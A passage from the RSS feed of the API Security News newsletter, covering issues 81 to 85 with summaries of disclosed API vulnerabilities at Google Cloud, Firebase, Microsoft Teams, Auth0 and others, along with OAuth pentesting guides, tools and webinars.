					<description><![CDATA[<p>This week, we check out the recently fixed vulnerability in Google Cloud Deployment Manager, and how to penetration test OAuth 2.0. On a higher level, we have Gartner&#8217;s classification of API security technology, and a recording of a panel discussion on API security. Vulnerability: Google Cloud Deployment Manager Google Cloud Deployment Manager is an infrastructure [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-85-vulnerability-google-cloud-deployment-manager-pentesters-guide-oauth/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-85-vulnerability-google-cloud-deployment-manager-pentesters-guide-oauth/">Issue 85: Vulnerability in Google Cloud Deployment Manager, a pentester&#8217;s guide to OAuth</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recently fixed vulnerability in Google Cloud Deployment Manager, and how to penetration test OAuth 2.0. On a higher level, we have Gartner&#8217;s classification of API security technology, and a recording of a panel discussion on API security.</p>
<h2>Vulnerability: Google Cloud Deployment Manager</h2>
<p>Google Cloud Deployment Manager is an infrastructure management service that makes it simple to create, deploy, and manage Google Cloud Platform resources. Ezequiel Pereira found <a href="https://www.ezequiel.tech/2020/05/rce-in-cloud-dm.html" target="_blank" rel="noopener noreferrer">an API vulnerability in Google Cloud Deployment Manager</a> and collected his $31K prize from Google as result.</p>
<p>Pereira found a way to make it invoke Google internal APIs that he was not supposed to invoke:</p>
<ol>
<li>He could invoke non-production versions of the GCDM API called <code>dogfood</code> and <code>staging</code> that provided him internal information on the workings of the system. A classic example of <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm" target="_blank" rel="noopener noreferrer">API9:2019 — Improper assets management</a> in the OWASP classification.</li>
<li>He used these API versions to figure out how to invoke the APIs of Google&#8217;s internal services, including Global Service Load Balancer (GSLB).</li>
<li>He took the advantage of the authentication logic that made calls through the service account of the service if user authentication failed.</li>
</ol>
<p>Beware of non-production versions of your APIs being accessible externally and having in turn access to production systems and data. Such non-production versions are as much &#8220;the real thing&#8221; as the production versions and require the same considerations. Also, be very careful how you design your authentication flow.</p>
<h2>Resources: PenTester&#8217;s Guide to OAuth 2.0 Authorization Code Grant</h2>
<p>Maxfield Chen has published an <a href="https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html" target="_blank" rel="noopener noreferrer">extremely detailed penetration testing guide for OAuth 2.0 Authorization Code Grant</a>. This is by far the most popular way of using OAuth 2.0, which in turn is the <em>de facto</em> standard of web and API access control. Yet, OAuth can be extremely confusing and there are many ways how OAuth implementations can go wrong.</p>
<p>Chen does a good job quickly recapping the flow and its components. Most importantly, he then proceeds to the main exploit scenarios and covers testing steps for each of them:</p>
<ul>
<li>Insufficient URI validation</li>
<li>Referrer header leaking code and state</li>
<li>Access token stored in browser history</li>
<li>Other access token leaks</li>
<li>Client secret leaks</li>
<li>Lack of state</li>
<li>Insecure state</li>
<li>Reused state</li>
<li>Invalid state validation</li>
<li>Reusable authorization codes</li>
<li>Access token stored in JavaScript</li>
<li>Implicit grant coercion</li>
<li><code>307</code> redirect attack</li>
</ul>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6917 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/05/OAuth_Auth-Code-flow.png" alt="" width="1292" height="1255" /></p>
<p>Definitely worth a closer look, if not as a pentester then as a reminder of what could go wrong.</p>
<h2>Analysts: Gartner&#8217;s Solution Path for Forming an API Security Strategy</h2>
<p>A few months ago, Gartner published their report &#8220;Solution Path for Forming an API Security Strategy&#8221; by Michael Isbitski, Frank Catucci, and Kirk Knoernschild. This report helps identify the different elements in the puzzle of the API security tooling.</p>
<p>The <a href="https://www.gartner.com/doc/3978700?ref=clientFriendlyURL" target="_blank" rel="noopener noreferrer">full report</a> requires subscription, but Michael has just posted <a href="https://www.linkedin.com/feed/update/urn:li:activity:6666110076333494272/" target="_blank" rel="noopener noreferrer">a quick summary</a>:</p>
<blockquote><p><em>API security continues to be top of mind for security practitioners as APIs underpin modern application design, data exchange and system integration. We published a research note towards the tail end of 2019 that provides guidance around API security strategy. There is no shortage of free and paid tooling in this space, but they address specific aspects of the overall API security puzzle. Secure design, testing, discovery, classification, monitoring, mediation and threat protection require a multi-pronged approach that cannot be satisfied with one technology, nor is it one size fits all for organizations. API security is also not just use of TLS to protect data in transit or access control to restrict who can access a given API. These are controls that improve security, but they should not be where your API security strategy begins and ends.</em></p></blockquote>
<p>And there is a nice diagram to make a sense of the categories in which different API security tools fall. Obviously, some tools (like the API security platform by my employer, <a href="https://42crunch.com/" target="_blank" rel="noopener noreferrer">42Crunch</a>) can cover multiple categories:</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6918" src="https://apisecurity.io/wp-content/uploads/2020/05/Gartner-Solution-Path-for-API-Security-Strategy.jpg" alt="" width="2254" height="1290" /></p>
<h2>Podcast: API Academy&#8217;s API Security Q&amp;A Panel</h2>
<p>The latest episode of API Academy is all about API security. Bill Oaks, Aran White, and Dmitry Sotnikov answer the frequently asked questions and cover a lot of API security ground in the discussion, such as:</p>
<ul>
<li>OWASP API Security Top 10</li>
<li>Upcoming OpenAPI 3.1 release and why standards matter</li>
<li>DevSecOps and API security</li>
<li>Minimal steps for API security</li>
<li>Why web application firewalls (WAFs) are failing for REST API security</li>
<li>Machine learning / Artificial Intelligence vs defined API contracts and rules</li>
<li>Schema validation</li>
<li>Rate limits and quotas</li>
<li>API responses: why they are also relevant and not just the requests</li>
<li>IoT device authentication</li>
<li> OAuth 2.1</li>
<li> Containers</li>
<li> Certificate management</li>
<li> SAML vs REST</li>
<li> Monitoring</li>
<li> API key distribution</li>
<li> API gateway and API firewall location</li>
</ul>
<p><iframe loading="lazy" title="TechTalk  Panel Discussion on API Security" width="640" height="360" src="https://www.youtube.com/embed/xqHTVAA9lCQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-85-vulnerability-google-cloud-deployment-manager-pentesters-guide-oauth/">Issue 85: Vulnerability in Google Cloud Deployment Manager, a pentester&#8217;s guide to OAuth</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 84: Unprotected APIs at Google Firebase, leaky Arkansas PUA portal</title>
		<link>https://apisecurity.io/issue-84-unprotected-apis-google-firebase-leaky-arkansas-pua-portal/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 May 2020 22:00:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6889</guid>

					<description><![CDATA[<p>This week, we take a look at how thousands of Android apps inadvertently exposed Google Firebase APIs, and how Arkansas Pandemic Unemployment Assistance (PUA) portal was leaking sensitive personal data. We also have a new pentesting tool for identifying data transformations used in APIs and apps, and a case study of four recent high-profile API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-84-unprotected-apis-google-firebase-leaky-arkansas-pua-portal/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-84-unprotected-apis-google-firebase-leaky-arkansas-pua-portal/">Issue 84: Unprotected APIs at Google Firebase, leaky Arkansas PUA portal</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at how thousands of Android apps inadvertently exposed Google Firebase APIs, and how Arkansas Pandemic Unemployment Assistance (PUA) portal was leaking sensitive personal data. We also have a new pentesting tool for identifying data transformations used in APIs and apps, and a case study of four recent high-profile API breaches.</p>
<h2>Vulnerability: Google Firebase</h2>
<p>Google Firebase is a development platform for mobile apps. It claims to be used in over 1.5 million mobile apps to provide standard platform functions like authentication, cloud storage, messaging, and analytics.</p>
<p>Security researchers from Comparitech found <a href="https://www.comparitech.com/blog/information-security/firebase-misconfiguration-report/" target="_blank" rel="noopener noreferrer">unsecured API access to the Firebase cloud storage used by estimated 24,000 Android apps</a>. The vulnerability is not really a vulnerability in Firebase itself, but how a lot of Android developers set up and use Firebase. It is also good to note that because Firebase is a cross-platform tool, the impact might not be limited to just Android.</p>
<p>Because the platform is cloud-based, there unfortunately is room for dire consequences if its security is configured poorly. The leaky deployments exposed REST APIs that allowed attackers to download end user data through <code>GET</code> requests, and even make changes to the data with <code>PUT</code> requests.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-medium" src="https://cdn.comparitech.com/wp-content/uploads/2020/04/firebase-data-2.jpg" width="738" height="244" /></p>
<p>For app developers, the important lesson learned here is that whenever your app uses a cloud service, <em>you</em> as the developer are responsible for configuring the security for the access to that cloud service, in the most secure manner!</p>
<p>On the other had, service providers need to strive to make their systems <em>secure by default</em> and make insecure configurations impossible. At the very least, if there is a legitimate use case for such a configuration, the service providers should highlight the risks to users and deter their customers from such scenarios.</p>
<h2>Vulnerability: Arkansas PUA portal</h2>
<p>An unemployed computer programmer found <a href="https://arktimes.com/arkansas-blog/2020/05/18/governor-shooting-the-messenger-wrong-tact-in-arkansas-pua-data-breach-experts-say">an API vulnerability in the Arkansas PUA website</a> when applying for assistance.</p>
<p>The portal had an unprotected API connecting to the backend. This exposed highly confidential personal information — including social security numbers and bank account numbers — of about 30,000 applicants who had used the portal. Definitely something you could do without when you are already in a tight spot.</p>
<p>What aggravates the case even further is the reaction from the state authorities. When notified about the issue, they took the site offline to fix it (great!), but also announced that they had asked FBI to go after the researcher who alerted them!</p>
<h2>Tool: Transformations</h2>
<p>Quite often, APIs and applications use encoding rather than encryption when storing and transmitting data. This approach is more security by obscurity, and attackers can get hold of the content as long as they know which algorithms were used in encoding. To catch this, penetration testers need to be able to fish out whether the system they test is indeed merely encoding values and how.</p>
<p>Jobert Abma has published a new open source tool, <a href="https://github.com/jobertabma/transformations" target="_blank" rel="noopener noreferrer">Transformations</a>, for just that. You feed a known input-output pair into the tool and it tries various combinations of known encoding algorithms on the pair to see if it can find a match.</p>
<p>For example, when given the combination of the input <code>test</code> and the output <code>c1aa46d751f1ffa58481418667134109ac5f573c</code>, the tool reports it was produced with the combination <code>stringReverse(sha1(md5(md5("test"))))</code>. Pretty neat!</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6891 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/05/transformations.png" alt="" width="800" height="665" /></p>
<h2>Video: <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">The Anatomy of Four API Breaches</span></h2>
<p>Learning from someone else&#8217;s mistakes is the best way to learn. To this effect, 42Crunch has published a recording of a recent talk by their Field CTO, Isabelle Mauny. In it, she goes into the details of four recent high-profile API breaches: how they happened, what were the root causes, and what could have been done to prevent them.</p>
<p><iframe loading="lazy" title="The Anatomy of API Breaches" width="640" height="480" src="https://www.youtube.com/embed/fS93WkT362Y?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Webinar: Top API Security Issues Found During POCs</h2>
<p>And for those who want to learn more of Isabelle&#8217;s findings &#8211; she is giving another <a href="https://us02web.zoom.us/webinar/register/WN_Ys3zjwsCQqG1hnPjNA4YiA" target="_blank" rel="noopener noreferrer">webinar next Tuesday, May 26</a>. This time it will be based on the Security Audit results she has been doing at some of the largest enterprise customers.</p>
<p>Here&#8217;s the abstract:</p>
<blockquote><p><em>Over the past 6 months, we have discovered many similarities across APIs from companies from very different industries. &#8220;This is an eye opener&#8221; is the most recurring comment from our prospects. We thought it would be worth sharing our findings in this webinar.</em></p>
<p><em>Through a mix of slides and demos, we will describe the top 5 issues our security audit reports, what they are and why they matter, including:</em></p></blockquote>
<ul>
<li>
<blockquote><p><em>Potentials attacks linked to each issue</em></p></blockquote>
</li>
<li>
<blockquote><p><em>How they can be remediated</em></p></blockquote>
</li>
<li>
<blockquote><p><em>Example request/response and reports</em></p></blockquote>
</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-84-unprotected-apis-google-firebase-leaky-arkansas-pua-portal/">Issue 84: Unprotected APIs at Google Firebase, leaky Arkansas PUA portal</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 83: India&#8217;s COVID-19 tracing app, OAuth2 API attacks</title>
		<link>https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 13 May 2020 22:00:55 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6865</guid>

					<description><![CDATA[<p>This week, we check out an API vulnerability in India&#8217;s coronavirus tracing app, a couple of write-ups on OAuth2 API attacks, and a recording of a talk on REST API penetration testing. Vulnerability: India&#8217;s coronavirus tracing app Elliot Alderson discovered API flaws in India&#8217;s COVID-19 tracking app, Aarogya Setu. In certain regions, the app is [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/">Issue 83: India&#8217;s COVID-19 tracing app, OAuth2 API attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out an API vulnerability in India&#8217;s coronavirus tracing app, a couple of write-ups on OAuth2 API attacks, and a recording of a talk on REST API penetration testing.</p>
<h2>Vulnerability: India&#8217;s coronavirus tracing app</h2>
<p>Elliot Alderson discovered <a href="https://medium.com/@fs0c131y/aarogya-setu-the-story-of-a-failure-3a190a18e34" target="_blank" rel="noopener noreferrer">API flaws in India&#8217;s COVID-19 tracking app</a>, Aarogya Setu. In certain regions, the app is mandatory, and not having it installed can lead to fines or even jail time.</p>
<p>The app can tell users how many people who have tested positive for COVID-19, or who have self-assessed to feel unwell, are nearby within the radius of from 500 meters to 10 kilometres. Or at least that is the theory. In practice, attackers can make the app to show them more.</p>
<p>Alderson found a combination of factors that allowed malicious use of the API:</p>
<ul>
<li>He overcame the checks for device rooting as well as certificate pinning, and got direct access to the API behind the app.</li>
<li>He could supply any latitude and longitude values to the API, and receive the data for a particular neighborhood.</li>
<li>He could tweak the catchment area to whatever he wanted because the predefined radius values were only in the client app, not enforced in the API.</li>
</ul>
<p>[<strong>UPDATE</strong>] One of the readers shared <a href="https://medium.com/@N1gh7m4r3/explaining-exposing-imaginary-arogyasetu-privacy-issue-433a6dc7b76e" target="_blank" rel="noopener noreferrer">this counter-story publication</a> debunking some of the claims in the original article. For example, looks like the app creators (at least as of right now) have implemented radius parameter validation on the API side. If an unexpected value is sent (e.g. 50 meters) the parameter defaults to 1 kilometre.</p>
<p>This means that an attacker could home in on someone and get the data for a specific address.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6866 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/05/Aarogya_Setu_API.png" alt="" width="1400" height="391" /></p>
<p>Bulk API calls were allowed, too. Thus, by invoking the API for a mesh of locations, the attacker can further triangulate the exact locations of infected people.</p>
<p>Not really something you&#8217;d like to see in an app that deals with such sensitive information and that you are forced to use.</p>
<p>[<strong>UPDATE2</strong>] Looks like there is some prevention from bulk calls now in place. <a href="https://twitter.com/sunnynehrabro/status/1261021449898332163" target="_blank" rel="noopener noreferrer">According to Sunny Nehra</a>: &#8220;I was using multiple calls.. all of a sudden got logged out after some calls and it did not let me login for some time with same phone number. I am trying to understand it better (though change of lat/long was quite much in my case) regarding server end filtering/restrictions&#8221;</p>
<p>Lessons learned here:</p>
<ul>
<li>Even seemingly anonymous data can become personal when combined with other data, especially geolocation.</li>
<li>You cannot rely on your APIs being only invoked by your client app. Someone might (will!) figure out a way to get to them directly.</li>
<li>Parameter ranges must be enforced on the API level, not just on the UI.</li>
<li>Bulk API calls are a source of data leaks.</li>
</ul>
<h2>Attack scenarios: OAuth Mix-Up, Revisited</h2>
<p>Dr. Daniel Fett has published <a href="https://danielfett.github.io/notes/oauth/Mix-Up%20Revisited.html" target="_blank" rel="noopener noreferrer">a great detailed document on OAuth mix-up attack scenarios and ways to mitigate them</a>. He covers, for example:</p>
<ul>
<li>Basic mix-up attack</li>
<li>Mix-up attacks with OAuth metadata</li>
<li>Mix-up attacks with Pushed Authorization Request (PAR) endpoint</li>
<li>Integrity of the Authorization Request with PAR</li>
</ul>
<p>In a mix-up attack on OAuth authentication, an attacker convinces the OAuth client to send credentials (authorization code or access token) that it obtained from an &#8220;honest&#8221; authorization server to the attacker&#8217;s server:</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6867 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/05/OAuth2-mix-up-attack.png" alt="" width="763" height="551" /></p>
<h2>Tips and tricks: Pentesting OAuth</h2>
<p>And while we are in the world of OAuth, the blog A Bug&#8217;z Life has a post on the <a href="https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1" target="_blank" rel="noopener noreferrer">typical security flaws in OAuth implementations</a>:</p>
<ol>
<li>Weak <code>redirect_uri</code> configuration</li>
<li>Improper handling of state parameter</li>
<li>Assignment of accounts based on email address</li>
<li>Disclosure of secrets</li>
</ol>
<p>Check it out to be reminded of and avoid the common pitfalls.</p>
<h2>Video: API Hacking for the Actually Pretty Inexperienced hacker</h2>
<p>On the latest episode of the OWASP DevSlop show, Katie Paxton-Fear gave a talk on REST API hacking. Her talk focused on the following vulnerabilities from the OWASP API Security Top 10 list:</p>
<ul>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">API1:2019 — Broken object level authorization</a></li>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a></li>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm">API5:2019 — Broken function level authorization</a>.</li>
</ul>
<p>The talk included a demonstration of each of the flaws and practical tips on how to find them. The <a href="https://github.com/InsiderPhD/example-for-devslop/" target="_blank" rel="noopener noreferrer">source code of the demo app</a> is also available.</p>
<p><iframe loading="lazy" title="API hacking for the Actually Pretty Inexperienced hacker with Katie Paxton-Fear - OWASP DevSlop" width="640" height="360" src="https://www.youtube.com/embed/qqmyAxfGV9c?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/">Issue 83: India&#8217;s COVID-19 tracing app, OAuth2 API attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 82: Most common GraphQL vulnerabilities, pentesting with Insomnia</title>
		<link>https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 May 2020 22:00:09 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6857</guid>

					<description><![CDATA[<p>This week, we check out GraphQL security, penetration testing with Insomnia and Burp, cheat sheets for OAuth2 and JWT, and what consequences the growth of API economy is posing for cyber security. Opinion: The 5 most common vulnerabilities in GraphQL Although the adoption of GraphQL is still fairly limited, it is undeniably on the rise. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/">Issue 82: Most common GraphQL vulnerabilities, pentesting with Insomnia</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out GraphQL security, penetration testing with Insomnia and Burp, cheat sheets for OAuth2 and JWT, and what consequences the growth of API economy is posing for cyber security.</p>
<h2>Opinion: The 5 most common vulnerabilities in GraphQL</h2>
<p>Although the adoption of GraphQL is still fairly limited, it is undeniably on the rise. GraphQL is different from the traditional REST APIs: it is effectively a data query and manipulation language for APIs. When not done right, GraphQL APIs can vastly expand the surface area for data attacks and lead to excessive data exposure.</p>
<p><a href="https://carvesystems.com/news/the-5-most-common-graphql-security-vulnerabilities/" target="_blank" rel="noopener noreferrer">Carve Systems have published a blog post</a> that summarizes the security issues that they see in GraphQL implementations. According to them, the most common GraphQL security vulnerabilities:</p>
<ol>
<li>Inconsistent authorization checks</li>
<li>REST proxies allow attacks on underlying APIs</li>
<li>Missing validation of custom scalars</li>
<li>No appropriate rate limiting</li>
<li>Introspection reveals non-public information</li>
</ol>
<p>They have also provided a link to the sample API they used for the blog post for a more hands-on experience. If you work with or are interested in GraphiQL, definitely worth  checking out.</p>
<h2>Cheat sheets: OAuth 2.0 and JWT security</h2>
<p>Every now and then, Philippe De Ryck releases great cheat sheets on cybersecurity. His two latest are highly relevant to API security:</p>
<ul>
<li>OAuth 2.0 best practices for developers</li>
<li>JSON Web Tokens (JWT)</li>
</ul>
<p>Grab them at his site <a href="https://pragmaticwebsecurity.com/cheatsheets.html" target="_blank" rel="noopener noreferrer">here</a>, and keep him on your radar for further handy resources.</p>
<h2>Tools: REST API pentesting with Insomnia and Burp</h2>
<p>Mic Whitehorn-Gillam posted an article on <a href="https://blog.secureideas.com/2020/04/getting-started-api-penetration-testing-with-insomnia.html" target="_blank" rel="noopener noreferrer">how to use Insomnia and Burp together for REST API penetration testing</a>. He covers, for example:</p>
<ul>
<li>Getting and installing Insomnia</li>
<li>Using Insomnia to post REST requests</li>
<li>Proxying Insomnia through Burp</li>
<li>Chaining requests</li>
</ul>
<p>This  is a sequel to his series on Postman and Burp that we covered in our <a href="https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/" target="_blank" rel="noopener noreferrer">issue 34</a>.</p>
<h2>Analysts: Alexei Balanagski (KuppingerCole)</h2>
<p>The latest KuppingerCole podcast episode features Alexei Balaganski explaining the cyber security consequences of API proliferation, and what needs to be done about it.</p>
<p>His topics include things like:</p>
<ul>
<li>Proliferation of APIs</li>
<li>Examples of breaches</li>
<li>Why API security is different from web security and API management, and thus needs specialized solutions</li>
<li>How API security needs to span everything from design, development, testing, runtime protection, and monitoring</li>
</ul>
<p><iframe loading="lazy" title="The Dark Side of the API Economy | Analyst Chat 9" width="640" height="360" src="https://www.youtube.com/embed/D1ho2JyL53k?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/">Issue 82: Most common GraphQL vulnerabilities, pentesting with Insomnia</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 81: Vulnerabilities in Microsoft Teams, Auth0, smart home hubs</title>
		<link>https://apisecurity.io/issue-81-vulnerabilities-microsoft-teams-auth0-smart-home-hubs/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 29 Apr 2020 22:00:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6834</guid>

					<description><![CDATA[<p>This week, we check out how Microsoft Teams could be breached with a single GIF image sent in a chat, and Auth0 by changing the case of a single character. In other news, a report on security issues in smart home hubs has been published, and a new online training on OAuth2.0 and OpenID Connect [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-81-vulnerabilities-microsoft-teams-auth0-smart-home-hubs/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-81-vulnerabilities-microsoft-teams-auth0-smart-home-hubs/">Issue 81: Vulnerabilities in Microsoft Teams, Auth0, smart home hubs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out how Microsoft Teams could be breached with a single GIF image sent in a chat, and Auth0 by changing the case of a single character.</p>
<p>In other news, a report on security issues in smart home hubs has been published, and a new online training on OAuth2.0 and OpenID Connect is available.</p>
<h2>Vulnerability: Microsoft Teams</h2>
<p>Researchers from CyberArk found <a href="https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/" target="_blank" rel="noopener noreferrer">a serious vulnerability in Microsoft Teams</a> that the vendor promptly fixed.</p>
<p>The attack vector was how Teams handled authentication to image resources and then allowed expansion to full API access. Here&#8217;s how the scenario went in a nutshell:</p>
<ol>
<li>Researches were able to take over two abandoned subdomains of <code>teams.microsoft.com</code>.</li>
<li>The researchers used the subdomains to host a simple GIF file that they could then send to a target user. Just the victim <em>seeing</em> the GIF was enough to return an authentication cookie to the attackers.</li>
<li>The researches then made an API call to exchange that cookie to an authentication token for the Teams APIs.</li>
<li>With full API access, the researchers could scrape the victim&#8217;s chat history for messages and information. They could also use the APIs to spread the attack with messages to the victim&#8217;s colleagues.</li>
</ol>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6836" src="https://apisecurity.io/wp-content/uploads/2020/04/MSFT-Teams-Attack-Flow_Graphic_FINAL.png" alt="" width="1920" height="1080" /></p>
<p>&nbsp;</p>
<p>Now, since this attack did not require <em>any</em> interaction from the user, it could be scaled up easily without it being in anyway obvious. A co-worker suddenly spamming a GIF to everyone could raise suspicions quickly. However, a single GIF sent to a Teams group would provide the attacker authentication tokens of several users with no one batting an eye.</p>
<p>This is a brilliant illustration of the dangers of wildcards in URLs, token exchange, and the power that APIs can give to attackers once they get past authentication.</p>
<h2>Vulnerability: Auth0</h2>
<p>JSON Web Tokens (JWT) is the prevalent format of authentication tokens in modern APIs. One of the common attack vectors on JWT is forging a token and then setting the signature algorithm in the token header to <code>alg:none</code>. This makes poor JWT implementations blindly trust such a token and do not verify its signature. For more details on the JWT standard and JWT attack vectors, see <a href="https://www.youtube.com/watch?v=M3jA0bGDCso" target="_blank" rel="noopener noreferrer">this AppSec California session recording</a>.</p>
<p>Modern tools and frameworks typically include out-of-the-box protection against this attack. However, Ben Knight found <a href="https://insomniasec.com/blog/auth0-jwt-validation-bypass" target="_blank" rel="noopener noreferrer">a flaw in how this protection was implemented in Auth0</a>.</p>
<p>Auth0&#8217;s check for <code>alg:none</code> was case-sensitive. Thus attackers could go around it simply by sending <code>alg:nonE</code> instead. This tiny change was enough to get the check to pass and disable the signature verification, in turn allowing attackers to forge tokens.</p>
<p>Luckily, Auth0 has since fixed the issue. Lessons learned:</p>
<ul>
<li>Case-sensitive checks are dangerous</li>
<li>Blacklisting (when you test for what should not happen) is more error-prone than whitelisting (when you only let through what is expecting)</li>
</ul>
<h2>Vulnerability: Fibaro, eQ‑3, and Elko smart home hubs</h2>
<p>Researchers from ESET have disclosed <a href="https://www.welivesecurity.com/2020/04/22/serious-flaws-smart-home-hubs-is-your-device-among-them/" target="_blank" rel="noopener noreferrer">API (and other) flaws in Fibaro Home Center Lite, Homematic Central Control Unit (CCU2), and eLAN-RF-003</a> smart home hubs that they found.</p>
<p>The list of vulnerabilities includes such classics as:</p>
<ul>
<li>Unencrypted HTTP calls</li>
<li>Unsecured APIs</li>
<li>Injections in URL parameters</li>
</ul>
<p>These cases are not exactly new: they were found and reported to vendors 2 years ago. However, the details were responsibly only published now to protect the users of unpatched models.</p>
<h2>Online training: Getting Started with OAuth and OpenID Connect</h2>
<p>More opportunities to learn new things online: Curity has published a free online course, &#8220;<a href="https://curity.io/resources/webinars/course-getting-started-with-oauth-and-openid-connect/" target="_blank" rel="noopener noreferrer">Getting Started with OAuth and OpenID Connect</a>&#8220;.</p>
<p>The course topics include:</p>
<ol>
<li>Introduction to OAuth</li>
<li>OAuth vs OpenID Connect</li>
<li>Tokens and APIs</li>
<li>Server to Server Communication with OAuth</li>
<li>Design tokens for your APIs</li>
<li>Dynamic Clients and Metadata</li>
<li>OAuth for Mobile Applications</li>
<li>OAuth for Single Page Applications</li>
</ol>
<p>Each lesson takes about 30 minutes, so they do not make a huge dent to your day, and you can slot them in when it bests suits you.</p>
<p>The post <a href="https://apisecurity.io/issue-81-vulnerabilities-microsoft-teams-auth0-smart-home-hubs/">Issue 81: Vulnerabilities in Microsoft Teams, Auth0, smart home hubs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 80: API vulnerabilities IBM Data Risk Manager and Cisco Unified Computing System</title>
		<link>https://apisecurity.io/issue-80-api-vulnerabilities-ibm-data-risk-manager-cisco-unified-computing-system/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 22 Apr 2020 22:00:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6821</guid>

